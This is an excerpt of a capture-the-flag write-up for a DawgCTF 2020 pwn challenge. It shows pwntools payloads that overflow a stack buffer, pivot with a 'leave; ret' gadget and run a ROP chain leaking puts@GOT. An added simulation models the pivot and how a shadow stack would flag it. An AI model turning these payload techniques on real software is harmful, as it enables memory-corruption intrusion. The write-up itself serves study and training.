Tags: pwn stack_pivot rop 

Stack pivot first, then use the `leave; ret` gadget to enter the ROP chain.

```python
# Stage 1: stack pivot.
# `ebp` is the leaked frame pointer of the vulnerable function and `leave`
# is the address of the `leave; ret` gadget; both are resolved in the full
# writeup and are not shown in this excerpt.
payload = cyclic(12)           # fill the 12-byte buffer up to the saved ebp
payload+= p32(ebp)             # saved ebp (keep it pointing at the real frame)
payload+= p32(0x080496d1)      # return address
payload+= p32(0xdeadbeef)      # padding
ru('So where we roppin boys?\n')
se(payload)

# Stage 2: rop1 -- leak puts@GOT, then return to main.
# The chain is written at the start of the buffer (ebp-0xc). The forged saved
# ebp points 4 bytes below it so that the gadget's `pop ebp` eats that word
# and its `ret` pops the first chain entry.
ropchain = p32(elf.sym['puts'])+p32(elf.sym['main'])+p32(elf.got['puts'])
pl2 = ropchain
pl2+= p32(ebp-0xc-4)           # forged ebp: chain start minus 4
pl2+= p32(leave)               # return address: `leave; ret` gadget
pl2+= p32(0xdeadbeef)          # padding
se(pl2)
```
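Why the second payload uses `ebp-0xc-4`: `leave` is `mov esp, ebp; pop ebp`, so after the pop `esp` sits 4 bytes above whatever the forged ebp pointed at, and `ret` pops from there. The buffer starts 12 bytes (`cyclic(12)`) below the saved ebp, so aiming the forged ebp at `buffer-4` lands the gadget's `ret` on the first chain entry. The register-level model below is an added example, not code from the writeup; every address in it is a constructed placeholder, and the buffer offset is inferred from the payload layout rather than stated on the page. It runs the two `leave; ret` rounds and also models a shadow stack (the mechanism behind Intel CET): both `ret`s pop an address that no `call` ever pushed, which is exactly the mismatch a shadow stack reports.

```python
# Model of the two-stage `leave; ret` pivot, with a shadow-stack check.
# Added illustration; all addresses are hypothetical, not from the challenge binary.
PUTS_PLT  = 0x08049040   # hypothetical elf.sym['puts']
MAIN      = 0x080491f6   # hypothetical elf.sym['main']
PUTS_GOT  = 0x0804c010   # hypothetical elf.got['puts']
LEAVE_RET = 0x080492a3   # hypothetical address of a `leave; ret` gadget
LEGIT_RET = 0x08049230   # hypothetical genuine return address of the vulnerable function
FRAME_EBP = 0xffffd0b8   # hypothetical leaked ebp of the vulnerable frame
BUF_LEN   = 12           # cyclic(12): the buffer begins at ebp - 0xc (inferred)


def rd(mem, addr):
    """Read a dword; unwritten stack words read as a constructed filler value."""
    return mem.get(addr, 0x41414141)


def leave_ret(regs, mem, shadow):
    """Execute `leave; ret`: mov esp, ebp ; pop ebp ; pop eip.

    `shadow` models a hardware shadow stack: it holds the return address the
    CPU recorded at call time, and every `ret` is compared against it.
    Returns True when the popped target disagrees with the shadow stack."""
    regs["esp"] = regs["ebp"]                       # mov esp, ebp
    regs["ebp"] = rd(mem, regs["esp"]); regs["esp"] += 4   # pop ebp
    target = rd(mem, regs["esp"]);      regs["esp"] += 4   # pop eip
    expected = shadow.pop() if shadow else None
    regs["eip"] = target
    return target != expected


def lay_out_stage2(mem, frame_ebp):
    """Write the writeup's second payload into the toy stack: the ROP chain at
    the buffer start, forged ebp = chain_start - 4, return slot = gadget."""
    buf = frame_ebp - BUF_LEN
    chain = [PUTS_PLT, MAIN, PUTS_GOT]   # puts(puts@got) then return to main
    for i, word in enumerate(chain):
        mem[buf + 4 * i] = word
    mem[frame_ebp] = buf - 4             # saved ebp slot
    mem[frame_ebp + 4] = LEAVE_RET       # return address slot
    return buf


def run_pivot(frame_ebp=FRAME_EBP):
    """Run the vulnerable function's epilogue and then the gadget, returning the
    register state and which `ret`s the shadow stack would have flagged."""
    mem = {}
    buf = lay_out_stage2(mem, frame_ebp)
    regs = {"ebp": frame_ebp, "esp": buf, "eip": 0}
    shadow = [LEGIT_RET]   # pushed by the legitimate call into the function

    # 1) epilogue of the vulnerable function: ebp <- buf-4, eip <- gadget
    v1 = leave_ret(regs, mem, shadow)
    # 2) the gadget itself: esp <- buf-4, pop filler into ebp, eip <- chain[0]
    v2 = leave_ret(regs, mem, shadow)

    return {"eip": regs["eip"], "esp": regs["esp"], "ebp": regs["ebp"],
            "buf": buf, "violations": [v1, v2]}


if __name__ == "__main__":
    r = run_pivot()
    print("eip after pivot: %#x (puts)" % r["eip"])
    print("esp after pivot: %#x = buf+4, next ret pops main" % r["esp"])
    print("shadow-stack violations on the two rets:", r["violations"])
```

After the second round `eip` is `puts` and `esp` points at the chain's second word, so `puts` returns into `main` with `puts@got` sitting where the argument is expected. The model has no canary because the writeup's payload overwrites the saved ebp directly; with a canary in the 12 bytes before it, or with a shadow stack checking the two mismatched `ret`s, this sequence stops at the first epilogue.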

[more details](http://taqini.space/2020/04/13/DawgCTF-2020-Pwn-rop-Writeup/)

Original writeup (http://taqini.space/2020/04/13/DawgCTF-2020-Pwn-rop-Writeup/).